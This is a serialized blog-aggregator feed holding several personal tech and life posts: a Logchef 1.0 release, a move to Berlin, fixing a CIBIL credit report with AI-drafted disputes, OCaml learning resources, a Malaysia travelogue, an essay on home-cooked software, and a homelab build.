or any MCP-compatible client. Instead of context-switching between your AI chat and the log viewer, you can ask directly:\n“What log sources do I have access to?”\n“Find all 500 errors in the last hour from the web service”\n“Show me a histogram of log volume over the past day”\n“What are the most common error messages in the database logs?”\nThe MCP server handles discovery (teams, sources, schemas), querying (full ClickHouse SQL), analysis (histograms, saved queries), and even admin operations. It’s a separate binary that runs alongside Logchef – configure it once, and your AI assistant can query your logs through natural conversation.\nCompact View for Terminal Lovers#\n\n\nNot everyone wants a table. The compact view is a terminal-style display that shows logs as formatted text with syntax highlighting. Denser and faster to scan for certain debugging workflows.\nQuery Variables#\nUse {{namespace}} in your query, and an input field appears automatically. Great for saved queries that teams want to reuse with different parameters.\nThis was a community contribution from @songxuanqing. The implementation detects {{variable}} patterns in the query text and renders input fields dynamically.\nTeam Management and RBAC#\n\n\nLogchef supports multi-tenancy with role-based access. Teams can have multiple data sources, and users can be members of multiple teams with different roles:\nAdmin: Full access, can manage team members and sources\nEditor: Can create\u002Fedit saved queries and collections\nViewer: Read-only access to query and explore logs\nThis integrates with OIDC for SSO, so you can use your existing identity provider.\nAdmin UI for Runtime Config#\nConfigure stuff without touching config files. The admin settings panel lets you change AI configuration, Alertmanager connection, authentication settings, and query timeouts.\n\n\nThis was a migration from config files to database-backed settings. On first boot, Logchef seeds the database from config.toml. After that, the UI takes over and changes are stored in SQLite. Backward compatible – existing config files still work, the UI just overrides them at runtime. No more SSH-ing into production to bump a timeout.\nPrometheus Metrics#\nA \u002Fmetrics endpoint exposes query execution times, error rates, active queries, and other operational data. There’s a pre-built Grafana dashboard for monitoring Logchef itself.\nWhat’s Not in 1.0#\nSome things didn’t make the cut:\nLive tail: Streaming logs in real-time. Still on the roadmap.\nDashboarding: Multiple visualizations on one page. Logchef is query-focused; for dashboards, you probably want Grafana with ClickHouse as a datasource.\nCalling It 1.0#\nCalling something “1.0” is weird. There’s no clear line where software becomes “ready.” But I’ve been using Logchef daily at work for months now, and it’s at the point where I trust it. The rough edges are mostly smoothed out. The architecture feels right.\nBuilding tools you use yourself is different. You’re the first to hit the rough edges, so you fix them. Slower than building for imaginary users, but the result is something you actually want to use.\nThanks again to Kailash for the early direction (schema-agnostic was his idea), and to everyone at Zerodha who’s been using this and giving feedback. Thanks to @songxuanqing for query variables and other contributors for docs and bug fixes.\nDemo | Docs | GitHub | v1.0.0 Release\nFin!",[],{"slug":291,"title":292,"link":293,"pubDate":294,"contentSnippet":295,"tags":296,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"berlin","I'm moving to Berlin","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2025\u002F12\u002F12\u002Fberlin\u002F","2025-12-12T00:00:00.000Z","Haven’t posted here in a while, but this is worth an update: I’m moving to Berlin.\nI’ve loved living in Bangalore for the last decade (I moved here just after the\nfirst HillHacks in May 2015), but it is time for an adventure.\nFor the last couple of years, I’ve spent my time living in\nIndiranagar, building communities, helping underline.center,\nworking on blr.today, organizing events, and really doing things that I care\nabout. It has been a wonderful time, but we wanted to experience life\nelsewhere, and Berlin seems to fit the bill.\nBangalore’s infrastructure has been in the news, and it is a part of why I’m\nmoving. An unwalkable footpath on CMH road meant we spent half a year dealing\nwith a broken elbow this year. At Takshashila, I was taught that I’m not\nallowed to bring up civic problems without also coming up with solutions. But\nBangalore is an unsolvable paradox: A city with 50+ unicorns and no walkable\nfootpaths.\nI’ve fought my personal share of battles against the state, but this is one\nwhere I don’t have any hope of making a difference. I appreciate the work\nthat the Bangalore Civil Society is doing in attempting to hold the\nmissing-government accountable - it just isn’t the kind of work that I want\nto do. Fighting for basic necessities (clean air, walkable footpaths, open\npublic spaces, well-funded public transit) shouldn't be anyone's job in a\ncity as large as Bangalore. I’m picking Exit (for now).\nWhy Berlin? Mainly because I have lots of friends there. Our immigration journey\nis still quite early, so maybe I can write about it when things have stabilized\na bit. For now, if you have any Berlin recommendations or connections, please\nsend them my way.",[],{"slug":298,"title":299,"link":300,"pubDate":301,"contentSnippet":302,"tags":303,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"fixing-cibil-with-ai","Fixing a CIBIL Score Disaster with AI","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Ffixing-cibil-with-ai\u002F","2025-12-04T00:00:00.000Z","About a month ago, I downloaded my CIBIL report expecting a routine check. Instead, I found loans from lenders I had never interacted with, written-off accounts, overdues from fintechs I had never installed, and even two-wheeler loan enquiries. I don’t even ride a bike.\nMy credit score had collapsed to under 680. I stared at the report trying to understand how this could happen.\nThe Root Cause: A Wrong Date of Birth#\nBuried in my profile section was the problem: my date of birth was wrong. Not a typo, but a completely different year.\nBecause of this mismatch, CIBIL’s system had paired my PAN and mobile number with someone else’s DOB, effectively merging two individuals’ credit histories into one report. The accounts mapped to me included:\nAditya Birla Capital: Short-term personal loan marked as doubtful\u002Fsubstandard\nClix Capital: A loan marked written-off (₹50,000+)\nPoonawalla Fincorp: Personal loans with delayed payments\nRing \u002F Kissht: Unsecured digital loans\nInCred: Personal loan I never took\nDhani Loans: BNPL-style loan with unrecognized activity\nAxio (Capital Float): Old consumer loan\nKrazyBee: Various short-term loans\nTransactree: Small-ticket personal loan\nMultiple enquiries from HDFC, ICICI, IDFC First, Shriram Finance, and others\nSome were written-off, others 90+ days overdue, others still active. On paper, I looked like a serial defaulter.\nUsing AI to Understand the Problem#\nI opened ChatGPT and uploaded the entire PDF with a simple prompt: identify everything wrong in this report.\nWithin minutes, it had mapped every suspicious account, flagged which ones didn’t match my history, highlighted the incorrect DOB, and explained why CIBIL systems mis-map accounts when demographic data is inconsistent.\nMore usefully, it drafted formal dispute letters citing relevant RBI regulations and prepared lender-specific escalations with the right legal language. It felt like having a credit compliance team on demand.\nThe Dispute Process#\nWith the AI-drafted communications as a starting point, I sent disputes to CIBIL and direct emails to each lender. The key was being specific: every email included the CIBIL report control number, the exact account identifiers from the report, and references to specific RBI regulations.\nFor example, when writing to Poonawalla Fincorp about a co-lending arrangement with Kissht, the email included:\nCIBIL Report details:\nControl Number: [REDACTED]\nDownloaded on: [DATE]\nWhere your name appears: “POONAFIN – Personal Loan – Account No. [REDACTED]”\nDelinquency trail in history: DPD values 35 \u002F 62 \u002F 93 \u002F 124 during [MONTHS]\nI reiterate that I have never applied for, signed, or availed any facility from Poonawalla\u002FKissht. This appears to be erroneous mapping \u002F data contamination.\nThe emails also cited the relevant regulations explicitly:\nUnder Section 45-A(2) of the Credit Information Companies (Regulation) Act 2005 and Para 7.2.2 & 8.1.3 of the RBI Master Directions on Credit Information Companies (2021), please verify this record against your origination\u002FKYC systems. If the record is not verifiable or was created with misused\u002Fincorrect KYC, immediately instruct TransUnion CIBIL to delete\u002Fcorrect the entry.\nThis kind of precise, regulation-backed language gets results. Vague complaints are likely to get ignored or deprioritized. Specific complaints with control numbers, account IDs, and regulatory citations get escalated to teams that can actually fix things.\nFor co-lending cases (common with fintechs like Kissht, Ring, etc.), I learned to CC both parties and explicitly request a “consolidated correction” so the entry gets fully removed rather than bouncing between two institutions.\nWhen initial responses were slow, I sent reminders that referenced the original complaint number and the 30-day statutory deadline:\nThis is a reminder regarding my complaint Ref No. [REDACTED]. The acknowledgement stated that the issue would be resolved by [DATE], yet I have not received any confirmation.\nFailure to resolve within the statutory period will leave me with no option but to escalate to the RBI Integrated Ombudsman.\nCIBIL started closing disputes. One by one, accounts were removed. Eight fraudulent accounts were purged in the first wave.\nBut there was a catch: even after the fraudulent accounts were removed, my DOB was still wrong. CIBIL kept closing my DOB correction disputes without actually fixing the underlying data. Their responses were templated and generic, treating it like a lender issue when DOB is actually a CIBIL demographic field that they control directly.\nThis required escalating to the Nodal Officer with a sharper tone:\nMy Date of Birth correction dispute has been closed twice, yet my DOB remains incorrect in every new CIBIL report. This is a CIBIL demographic field — it is not lender-controlled and should have been corrected immediately once KYC was submitted.\nBecause of this incorrect DOB, my profile was wrongly merged with another individual’s data. Although many wrong accounts have been removed, the root cause remains uncorrected — the wrong DOB is still mapped, and therefore the risk of future wrongful linkages still exists.\nOnly after escalating to the Nodal Officer did the DOB finally get corrected. Once that happened, the system stopped associating the other person’s accounts with my profile. It was an algorithmic identity collision, and fixing the DOB resolved it.\nThe Outcome#\nMy latest CIBIL report shows the correct date of birth, zero fraudulent loans, no written-off or overdue accounts, and a score back in a healthy range. Only my actual accounts remain.\nWhat I Learned#\nCredit bureaus are not infallible. A single incorrect demographic detail (in my case, a mismatched DOB) can cause wrong loan mappings, score drops, false delinquencies, and a complete distortion of your financial identity.\nThe resolution required documentation, persistence with escalations, and an understanding of RBI regulations. AI made the last part significantly easier. Instead of spending hours researching dispute procedures and drafting formal letters, I could focus on gathering the right documents and following up with the right people.\nIf you haven’t checked your CIBIL report recently, it’s worth verifying that your basic details are correct: DOB, PAN, address, mobile, email. One wrong field can create problems that take weeks to untangle.\nFin!",[],{"slug":305,"title":306,"link":307,"pubDate":308,"contentSnippet":77,"tags":309,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"how-openalgo-websocket-works-8c5e61b71d06","How OpenAlgo WebSocket Works","https:\u002F\u002Fopenalgo.medium.com\u002Fhow-openalgo-websocket-works-8c5e61b71d06?source=rss-cda86e929c3------2","Wed, 26 Nov 2025 07:42:18 GMT",[310,311,80,81,82],"zmq","websocket",{"slug":313,"title":314,"link":315,"pubDate":316,"contentSnippet":77,"tags":317,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"white-box-vs-black-box-algorithms-6eacc52cc2fc","White Box vs Black Box Algorithms","https:\u002F\u002Fopenalgo.medium.com\u002Fwhite-box-vs-black-box-algorithms-6eacc52cc2fc?source=rss-cda86e929c3------2","Wed, 26 Nov 2025 03:51:48 GMT",[318,319,320,321,322],"market-regulation","sebi","black-box","white-box","trading-algorithms",{"slug":324,"title":325,"link":326,"pubDate":327,"contentSnippet":77,"tags":328,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"claude-opus-4-5-nano-banana-the-ai-stack-that-turned-my-github-repo-into-a-pitch-deck-cd39f294dead","Claude Opus 4.5 + Nano Banana: The AI Stack That Turned My GitHub Repo into a Pitch Deck","https:\u002F\u002Fopenalgo.medium.com\u002Fclaude-opus-4-5-nano-banana-the-ai-stack-that-turned-my-github-repo-into-a-pitch-deck-cd39f294dead?source=rss-cda86e929c3------2","Tue, 25 Nov 2025 06:10:20 GMT",[329,330,81,331,332],"pitch-deck","nanobanana-ai","claude-code","powerpoint",{"slug":334,"title":335,"link":336,"pubDate":337,"contentSnippet":338,"tags":339,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"hello-for-fediverse","Hello for Fediverse!","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2025\u002F11\u002F16\u002Fhello-for-fediverse\u002F","Sun, 16 Nov 2025 13:22:27 +0000","I started exploring fediverse today",[224,340,341],"#fediverse","newbie",{"slug":343,"title":344,"link":345,"pubDate":346,"contentSnippet":347,"tags":348,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"hacking","Foundations for hacking on OCaml","https:\u002F\u002Fkcsrk.info\u002Focaml\u002F2025\u002F11\u002F10\u002Fhacking\u002F","2025-11-10T10:35:00.000Z","How do you acquire the fundamental computer skills to hack on a complex\nsystems project like OCaml? What’s missing and how do you go about\nbridging the gap?\nThere are many fundamental systems skills that go into working on a\nlanguage like OCaml that only come with soaking in systems programming. By\nsystems programming, I mean the ability to use tools like the command-line,\neditors, version control, build systems, compilers, debuggers, bash scripting,\nand so on.  This is often something that one takes for granted when working on\nsuch projects, but is often inscrutable for new contributors, who may not have\nhad the opportunity to develop these skills.\nI struggle with this in my own research group. Students approach me to work on\nthe OCaml compiler because they have studied OS, Compilers and Computer\nArchitecture in class. But once they understand that working on OCaml involves\nactually hacking on systems, they are often lost. How do you build the compiler\nfrom source? How do you manage your changes? Do I have to build the entire\ncompiler if I make a small change in the runtime system? The compiler crashes\nwith a segfault – how do I debug it? Worse, the students do not even know what\nquestions to ask, and come back with “This is all new to me, I don’t know where\nto begin. ChatGPT doesn’t help.”\nThe CS education in India often lacks a focus on these practical systems skills,\nwhich can make it challenging for new contributors to get involved in systems\nprogramming.  Looking at my own past, my undergraduate CS education, like many\nothers in India (and potentially elsewhere), had mandatory OS and Compiler\nConstruction courses. But neither had a dedicated lab component. It is natural\nthat these theoretical courses do not prepare the students for the practical\naspects of systems programming.\nI was privileged to have a computer at my school, an IBM PC AT Model 5170 and\nlater an IBM PC 340, and surprisingly, had an education where I got to do\nprogramming from a very young age. There was lots of BASIC programming but also\njust tinkering with the system, learning how to use DOS, and later Windows 3.1,\n95, and of course playing games (Doom and Prince of Persia, mostly). This early\nexposure to computers and systems programming gave me a head start. Many\nstudents, especially those from less privileged backgrounds, do not have this\nearly exposure. They may have learned some programming, but not had the time to\ntinker with systems for extended periods of time.\nThis challenge of bridging the gap between theoretical CS education and\npractical systems programming skills is a common one faced by professors working\nin the broad systems area. The problem is compounded by the fact that these\nskills are difficult to teach in a traditional classroom setting—they require\nhands-on experience, experimentation, and often many hours of frustration and\ndebugging. These are skills that come from doing, not from reading or watching\nlectures. I would be curious to hear from others about their experiences and how\nthey have addressed this challenge.\nThat said, there are resources available online that can help new contributors\nacquire these skills. This list is biased to the areas of the compiler that I\nwork on. I mainly work on the backend and the runtime system. The only reason I\nusually touch the frontend is to lower the features that I care about to the\nbackend. Here are some I have found useful for working on the OCaml compiler:\nSystems programming\n    \nCourse: MIT Missing Semester: This is a\nfantastic resource that covers a wide range of topics related to systems\nprogramming, including command-line tools, version control, editors, and\nmore. The course is available online for free and includes video lectures,\nnotes, and exercises. I encourage you to read the motivation for this\ncourse.\nCourse: Stanford CS45: CS45 is an extended version\nof the MIT course, and delves into the topics in more detail.\nVideo: CppCon 2015: Greg Law “Give me 15 minutes & I’ll change your view of\nGDB”: The talk explores GDB’s\nless-known features and sheds light on some advanced debugging techniques.\nTool: rr - Lightweight Recording and Deterministic Debugging:\nrr is a powerful tool for recording and replaying program execution, which\ncan be invaluable for debugging complex issues in systems programming. I’ve\nstopped using gdb directly for anything non-trivial and have switched to\nrr.\nOCaml\n    \nCourse: CS3100 Paradigms of Programming:\nThe course covers a significant chunk of the OCaml language. You should be able\nto self-study the course to get a good understanding of the language. That said,\nthe course deliberately does not cover the build system (dune), package manager\n(opam), command-line tools for the compiler (ocamlc, ocamlopt), editor\nintegration (merlin, ocaml-lsp, ocamlformat), etc.\nBook: Real World OCaml: The book has a section on the\ncompiler and the runtime system, which gives a great overview of the memory\nrepresentation, garbage collection, and other aspects of the runtime system.\nDiving deeper\n    \nBook: Systems Performance: Enterprise and the Cloud, 2nd Edition:\nThis book provides an in-depth look at systems performance, covering topics\nsuch as CPU architecture, memory hierarchy, storage systems, and networking.\nIt is a valuable resource for understanding the underlying principles of\nsystems programming and performance optimization.\nBook: The Garbage Collection Handbook: This book\noffers a comprehensive overview of garbage collection techniques, algorithms,\nand implementations. It is an essential resource for understanding memory\nmanagement in programming languages like OCaml.\nBook: The Art of Multiprocessor Programming:\nThis book provides a deep dive into concurrent programming and\nsynchronization techniques, which are crucial for understanding\nmulti-threaded runtime systems like OCaml 5’s multicore runtime and the\nprogramming model.\n \n\nI will probably keep editing this post as I find more resources. If you have\nsuggestions for other useful resources or experiences to share, please feel free\nto reach out to me.",[],"KC Sivaramakrishnan","kayceesrk","\u002Fimages\u002Fkayceesrk_photo.jpg","https:\u002F\u002Fkcsrk.info\u002Fatom.xml",{"slug":354,"title":355,"link":356,"pubDate":357,"contentSnippet":358,"tags":359,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"a-bad-day-in-malaysia","A Bad Day in Malaysia","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fa-bad-day-in-malaysia\u002F","Fri, 07 Nov 2025 12:55:20 +0530","Continuing from where Badri and I left off in the last post. On the 7th of December 2024, we boarded a bus from Singapore to the border town of Johor Bahru in Malaysia. The bus stopped at the Singapore emigration for us to get off for the formalities.\nThe process was similar to the immigration at the Singapore airport. It was automatic, and we just had to scan our passports for the gates to open. Here also, we didn’t get Singapore stamps on our passports.\nAfter we were done with the emigration, we had to find our bus. We remembered the name of the bus company and the number plate, which helped us recognize our bus. It wasn’t there already after we came out of the emigration, but it arrived soon enough, and we boarded it promptly.\nFrom the Singapore emigration, the bus travelled a few kilometers and dropped us at Johor Bahru Sentral (JB Sentral) bus station, where we had to go through Malaysian immigration. The process was manual, unlike Singapore, and there was an immigration officer at the counter who stamped our passports (which I like) and recorded our fingerprints.\nAt the bus terminal, we exchanged rupees at an exchange shop to get Malaysian ringgits. We could not find any free drinking water sources on the bus terminal, so we had to buy water.\nBadri later told me that Johor Bahru has a lot of data centers, which need a lot of water for cooling. When he read about it later, he immediately connected it with the fact that there was no free drinking water, and we had to buy water. Such data centers can lead to scarcity of water for others in the area.\nFrom JB Sentral, we took a bus to Larkin Terminal, as our hotel was nearby. It was 1.5 ringgits per person (30 rupees). In order to pay for the fare, we had to put cash in a box near the driver’s seat.\nAround half-an-hour later, we reached our hotel. The time was 23:30 hours. The hotel room was hot as it didn’t have air-conditioning. The weather in Malaysia is on the hotter side throughout the year. It was a budget hotel, and we paid 70 ringgits for our room.\nBadri slept soon after we checked-in. I went out during the midnight at around 00:30. I was hungry, so I entered a small scale restaurant nearby, which was quite lively for the midnight hours. At the restaurant, I ordered a coffee and an omelet. I also asked for drinking water. The unique thing about that was that they put ice in hot water to make its temperature normal.\nMy bill from the restaurant looked like the below-mentioned table, as the items’ names were in the local language Malay:\nItem\nPrice (Malaysian ringgits)\nConversion to Indian rupees\nComments\n\n\n\n\nNescafe Tarik\n2.50\n50\nCoffee\n\n\nAis Kosong\n0.50\n10\nWater\n\n\nTelur Dadar\n2.00\n40\nOmelet\n\n\nSST Tax (6%)\n0.30\n6\n\n\n\nTotal\n5.30\n106\n\n\n\n\nAfter checking out from the restaurant, I explored nearby shops. I also bought some water before going back to the hotel room.\nThe next day, we had a (pre-booked) bus to Kuala Lumpur. We checked out from the hotel 10 minutes after the check-out time (which was 14:00 hours). However, within those 10 minutes, the hotel staff already came up three times asking us to clear out (which we were doing as fast as possible). And finally on the third time they said our deposit was forfeit, even though it was supposed to be only for keys and towels.\nThe above-mentioned bus for Kuala Lumpur was from the nearby Larkin Bus Terminal. The bus terminal was right next to our hotel, so we walked till there.\nUpon reaching there, we found out that the process of boarding a bus in Malaysia resembled with taking a flight. We needed to go to a counter to get our boarding passes, followed by reporting at our gate half-an-hour before the scheduled time. Furthermore, they had a separate waiting room and boarding gates. Also, there was a terminal listing buses with their arrival and departure signs. Finally, to top it off, the buses had seatbelts.\nWe got our boarding pass for 2 ringgits (40 rupees). After that, we proceeded to get something to eat as we were hungry. We went to a McDonald’s, but couldn’t order anything because of the long queue. We didn’t have a lot of time, so we proceeded towards our boarding gate without having anything.\nThe boarding gate was in a separate room, which had a vending machine. I tried to order something using my card, but the machine wasn’t working. In Malaysia, there is a custom of queueing up to board buses even before the bus has arrived. We saw it in Johor Bahru as well. The culture is so strong that they even did it in Singapore while waiting for the Johor Bahru bus!\nOur bus departed at 15:30 as scheduled. The journey was around 5 hours. A couple of hours later, our bus stopped for a break. We got off the bus and went to the toilet. As we were starving (we didn’t have anything the whole day), we thought it was a good opportunity to get some snack. There was a stall selling some food. However, I had to determine which options were vegetarian. We finally settled on a cylindrical box of potato chips, labelled Mister Potato. They were 7 ringgits.\nWe didn’t know how long the bus is going to stop. Furthermore, eating inside buses in Malaysia is forbidden. When we went to get some coffee from the stall, our bus driver was standing there and made a face. We got an impression that he doesn’t want us to have coffee.\nHowever, after we got into the bus, we had to wait for a long time for it to resume its journey as the driver was taking his sweet time to drink his coffee.\nDuring the bus journey, we saw a lot of palm trees on the way. The landscape was beautiful, with good road infrastructure throughout the journey. Badri also helped me improve my blog post on obtaining Luxembourg visa in the bus.\nThe bus dropped us at the Terminal Bersepadu Selatan (TBS in short) in Kuala Lumpur at 21:30 hours.\nFinally, we got something at the TBS. We also noticed that the TBS bus station had lockers. This gave us the idea of putting some of our luggage in the lockers later while we will be in Brunei. We had booked a cheap Air Asia ticket which doesn’t allow check-in luggage. Further, keeping the checked-in luggage in lockers for three days was cheaper than paying the excess luggage penalty for Air Asia.\nWe followed it up by taking a metro as our hotel was closer to a metro station. This was a bad day due to our deposit being forfeited unfairly, and got nothing to eat.\nWe took the metro to reach our hostel, which was located in the Bukit Bintang area. The name of this hostel was Manor by Mingle. I had stayed here earlier in February 2024 for two nights. Back then, I paid 1000 rupees per day for a dormitory bed. However, this time the same hostel was much cheaper. We got a private room for 800 rupees per day, with breakfast included. Earlier it might have been pricier due to my stay falling on weekends or maybe February has more tourists in Kuala Lumpur.\nThat’s it for this post. Stay tuned for our adventures in Malaysia!",[],{"slug":361,"title":362,"link":363,"pubDate":364,"contentSnippet":77,"tags":365,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"self-hosting-openais-gpt-oss-a-complete-guide-for-traders-1e85ec2a46ad","Self-Hosting OpenAI’s GPT-OSS: A Complete Guide for Traders","https:\u002F\u002Fopenalgo.medium.com\u002Fself-hosting-openais-gpt-oss-a-complete-guide-for-traders-1e85ec2a46ad?source=rss-cda86e929c3------2","Wed, 05 Nov 2025 07:32:42 GMT",[366,367,368,369,83],"gpt-oss","cline-extension","self-hosting","vllm",{"slug":371,"title":372,"link":373,"pubDate":374,"contentSnippet":77,"tags":375,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"building-an-agentic-trader-from-scratch-a-beginners-guide-bb74b10438b4","Building an Agentic Trader from Scratch: A Beginner’s Guide","https:\u002F\u002Fopenalgo.medium.com\u002Fbuilding-an-agentic-trader-from-scratch-a-beginners-guide-bb74b10438b4?source=rss-cda86e929c3------2","Mon, 03 Nov 2025 18:16:12 GMT",[83,376,377,378,81],"openai-agents-sdk","ai-trading","agentic-ai",{"slug":380,"title":381,"link":382,"pubDate":383,"contentSnippet":384,"tags":385,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"ai-home-cooked-software","AI and Home-Cooked Software","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fai-home-cooked-software\u002F","2025-10-05T00:00:00.000Z","Everyone is worried that AI will replace programmers. They’re missing the real revolution: AI is turning everyone into one.\nI’ve been noticing a new pattern: people with deep domain knowledge but no coding experience are now building their own tools. Armed with AI assistants, they can create custom workflows in a matter of days, bypassing traditional development cycles. Are these solutions production-ready? Not even close. But they solve urgent, specific problems, and that’s what matters. Tasks that once required weeks of specialized training are quickly becoming weekend projects.\nThis trend is happening even within the AI companies themselves. Anthropic, for example, shared how their own teams use Claude to accelerate their work. Crucially, this isn’t limited to developers. Their post details how non-technical staff now build their own solutions and create custom automations, providing a powerful real-world example of this new paradigm.\nHome-Cooked Software#\nWhy search for a generic tool when you can build exactly what you need? This question leads to what I call ‘home-cooked software’: small, personal applications we build for ourselves, tailored to our specific needs. Robin Sloan beautifully describes building an app as making “a home-cooked meal,” while Maggie Appleton writes about “barefoot developers” creating software outside traditional industry structures.\nWhat’s new isn’t the concept but the speed and accessibility. With AI, a custom export format, a specific workflow, or the perfect integration is now an afternoon’s work. We’re entering an unprecedented era where the barrier between wanting a tool and having it has nearly vanished.\nBut let’s be clear: the journey from a prototype to a production-ready application is as challenging as ever. In my experience, an AI can churn out a first draft in a few hours, which gets you surprisingly far. But the devil is in the details, and the last stretch of the journey – handling edge cases, ensuring security, and debugging subtle issues – can stretch into weeks. This distinction is crucial. AI isn’t replacing programmers; it’s creating millions of people who can build simple tools. There’s a significant difference.\nThe New Economics#\nAI is fundamentally reshaping the economics of building software. Before AI, even a simple tool required a significant time investment in learning programming basics, understanding frameworks, and debugging. Only tools with broad appeal or critical importance justified the effort. Now, that effort is measured in hours, not months, and the primary barrier is no longer technical knowledge, but imagination and a clear understanding of one’s own needs.\nThis doesn’t apply to complex or security-critical systems, where deep expertise remains essential. But for the long tail of personal utilities, automation scripts, and custom workflows, the math has changed completely. I’m talking about solving all those minor irritations that pile up: the script to reformat a specific CSV export, the dashboard showing exactly the three metrics you care about, or a script that pulls data from a personal project management tool to sync with an obscure time-tracking app.\nThese tools might be held together with digital duct tape, but they solve real problems for real people. And increasingly, that’s all that matters.\nThe Hidden Costs#\nBut this newfound capability isn’t free. It comes with what I call the “AI Tax”: a set of hidden costs that are rarely discussed.\nFirst, prompt engineering can be surprisingly time-consuming, especially for tasks of moderate complexity. While simple requests are often straightforward, anything more nuanced can become an iterative dialogue. You prompt, the AI generates a flawed output, you clarify the requirements, and it returns a new version that misses a different detail. It’s a classic 80\u002F20 scenario: you get 80% of the way there with a simple prompt, but achieving the final 20% of correctness requires a disproportionate amount of effort in refining, correcting, and clarifying your intent to the model.\nSecond, there’s the verification burden. Every line of AI-generated code is a plausible-looking liability. It may pass basic tests, only to fail spectacularly in production with an edge case you never considered. AI learned from the public internet, which means it absorbed all the bad code along with the good. SQL injection vulnerabilities, hardcoded secrets, race conditions—an AI will happily generate them all with complete confidence.\nPerhaps the most frustrating aspect is “hallucination debugging”: the uniquely modern challenge of troubleshooting plausible-looking code that relies on APIs or methods that simply don’t exist. Your codebase becomes a patchwork of different AI-generated styles and patterns. Six months later, it’s an archaeological exercise to determine which parts you wrote and which parts an AI contributed.\nBut the most significant danger is that AI enables you to build systems you don’t fundamentally understand. When that system inevitably breaks, you lack the foundational knowledge to debug it effectively.\nBuilding for One#\nDespite these challenges, there’s something profoundly liberating about building software just for yourself. Instead of just sketching out ideas, I’ve started building these small, specific tools. For this blog, I wanted a simple lightbox for images; instead of pulling in a heavy external library, I had Claude write a 50-line JavaScript snippet that did exactly what I needed. I built a simple, single-page compound interest calculator tailored for my own financial planning. To save myself from boilerplate at work, I created prom2grafana, a tool that uses an LLM to convert Prometheus metrics into Grafana dashboards.\nTen years ago, I might have thought about generalizing these tools, making them useful for others, perhaps even starting an open source project. Today? I just want a tool that works exactly how I think. I don’t need to handle anyone else’s edge cases or preferences. Home-cooked software doesn’t need product-market fit—it just needs to fit you.\nWe’re witnessing the emergence of a new software layer. At the base are the professionally-built, robust systems that power our world: databases, operating systems, and rock-solid frameworks. In the middle are commercial applications built for broad audiences. And at the top, a new layer is forming: millions of tiny, personal tools that solve individual problems in highly specific ways.\nThis top layer is messy, fragile, and often incomprehensible to anyone but its creator. It’s also incredibly empowering. Creating simple software is becoming as accessible as writing. And just as most writing isn’t professional literature, most of this new software won’t be professional-grade. That’s not just okay; it’s the point.\nThe implications are profound. Subject-matter experts can now solve their own problems without waiting for engineering resources, and tools can be hyper-personalized to a degree that is impossible for commercial software. This unlocks a wave of creativity, completely unconstrained by the need to generalize or find a market.\nYes, there are legitimate concerns. Security is a real risk, though the profile changes when a tool runs locally on personal data with no external access. We’re creating personal technical debt, but when a personal tool breaks, the owner is the only one affected. They can choose to fix it, rebuild it, or abandon it without impacting anyone else. Organizations, on the other hand, will soon have to grapple with the proliferation of incompatible personal tools and establish new patterns for managing them.\nBut these challenges pale in comparison to the opportunities. The barrier between user and creator is dissolving. We’re entering the age of home-cooked software, where building your own tool is becoming as natural as cooking your own meal.\nThe kitchen is open. What will you cook?",[],{"slug":387,"title":388,"link":389,"pubDate":390,"contentSnippet":391,"tags":392,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"state-homelab-2025","State of My Homelab 2025","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstate-homelab-2025\u002F","2025-10-04T00:00:00.000Z","Introduction#\nFor the past five years, I have maintained a homelab in various configurations. This journey has served as a practical exploration of different technologies, from Raspberry Pi clusters running K3s to a hybrid cloud setup and eventually a cloud-based Nomad setup. Each iteration provided valuable lessons, consistently highlighting the operational benefits of simplicity.\nThis article details the current state of my homelab. A primary motivation for this build was to dip my toes into “actual” homelabbing—that is, maintaining a physical server at home. The main design goal was to build a dedicated, reliable, and performant server that is easy to maintain. This led me to move away from complex container orchestrators like Kubernetes in favor of a more straightforward Docker Compose workflow. I will cover the hardware build, software architecture, and the rationale behind the key decisions.\nHardware Configuration#\nAfter considerable research, I selected components to balance performance, power efficiency, and cost. The server is designed for 24\u002F7 operation in a home environment, making noise and power consumption important considerations.\nThe Build#\n\nComponentChoicePrice\n\nCPUAMD Ryzen 5 7600X (6-core, 4.7 GHz)$167.58\nCPU CoolerARCTIC Liquid Freezer III Pro 360$89.99\nMotherboardMSI B650M Gaming Plus WiFi$225.83\nRAMKingston FURY Beast 32GB DDR5-6000$136.99\nBoot DriveWD Blue SN580 500GB NVMe$88.76\nStorage 1WD Red Plus 4TB (5400 RPM)$99.99\nStorage 2Seagate IronWolf Pro 4TB (7200 RPM)$150.00\nCaseASUS Prime AP201 MicroATX$89.99\nPSUCorsair SF750 (80+ Platinum)$169.99\nTotal$1,219.12\n\n\n\n\n\n\nComponent Rationale#\nCPU: The Ryzen 5 7600X provides a strong price-to-performance ratio. Its 6 cores offer ample headroom for concurrent containerized workloads and future experimentation.\nStorage: The boot drive is a 500GB NVMe for fast OS and application performance. The primary storage consists of two 4TB HDDs in a BTRFS RAID 1 configuration. To mitigate the risk of correlated failures, I chose drives from different manufacturers (WD and Seagate) purchased at different times.\nRAM: 32GB of DDR5-6000 provides sufficient memory for a growing number of services without risking contention.\nCase & PSU: The ASUS Prime AP201 is a compact MicroATX case with a clean aesthetic suitable for a home office. The Corsair SF750 (80+ Platinum) PSU was chosen for its efficiency and to provide capacity for a future GPU for local LLM or transcoding workloads.\nSystem Architecture & Deployment#\nMy previous setups involved Kubernetes and Nomad, but the operational overhead 